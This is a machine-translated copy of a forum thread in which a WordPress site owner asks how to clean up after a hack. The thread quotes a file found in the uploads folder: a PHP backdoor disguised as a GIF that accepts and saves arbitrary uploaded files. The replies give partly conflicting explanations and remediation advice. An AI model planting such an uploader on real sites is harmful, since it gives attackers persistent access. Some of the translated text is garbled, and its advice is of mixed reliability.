I在我的服务器上看到了highload,并查看了Apache Server-STATUS,并看到了一个帖子到/2C1067813C6D8D0F28E13F0CE2C024FCBC17267B.PHP,该帖子正在我的CPU中吃掉12%。 我关闭了Apache,移动了FI ...

问题描述 投票:0回答:1
I在服务器root

中创建了一个文件

410.php
<?php header('HTTP/1.0 410 Gone'); ?>

在我的.htaccess apache文件中我添加了

RewriteEngine On RewriteBase / RewriteCond %{REMOTE_ADDR} ^188.138.56.125 [OR] RewriteCond %{REMOTE_ADDR} ^188.138.56.125 RewriteRule ^.*$ 410.php [L]
i在我的wp-content/上载文件夹中也注意到了一个带有内容

GIF89a^A^@^A^@<80>^@^@<FF><FF><FF>^@^@^@!<F9>^D^A^@^@^@^@,^@^@^@^@^A^@^A^@^@^B^BD^A^@;^@<?php $f=preg_replace('/(.*wp-content).*/i','\1',di rname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);ech o "14qhpo"; ?>^@;
和其中一个目录,其中包含我的WordPress文件的777个权限,我也已删除。

我将在干净的目录中使用新的数据和插件来重新安装我的WordPress,但是我该如何防止它,或者更好地监视它?黑客做了什么,我该如何防止它/修复损害?

我在这里看到其他人也有相同的黑客攻击。
Edit11/23

trangely,我认为我粘贴的第一个代码可能是我刚刚安装的websitedefender.com的插件安全扫描/

http://wordpress.org/extend/plugins/websitedefender-wordpress-security/

我会以为如果是合法的,他们会注释该文件

没有什么可担心的(至少对于此问题),因为该文件和代码是标准的Websitedefender.com Sitecheck文件。我想您将其上传到您的网站并忘记了吗?

可能是Timthumb.php漏洞。 如果timthumb.php文件在系统上的任何位置,请确保将其删除。 您可能已经被多个人砍掉了,因此最好备份数据库并从最新版本中重新安装数据库并重新安装。

要检测您的应用程序中的漏洞,我建议使用漏洞扫描服务(例如siteWatch或诸如Skipfish的程序)测试您的网站。

我发生了类似的事情。 弱点肯定是插件,尤其是Akismet,但也是一些SEO插件。 这些可以允许注射攻击或更糟。

php wordpress security
1个回答
4
投票
您最好的选择是擦除您的服务器并从您上次已知的良好备份中重建。 没有其他东西会真正值得信赖。

最新问题
© www.soinside.com 2019 - 2025. All rights reserved.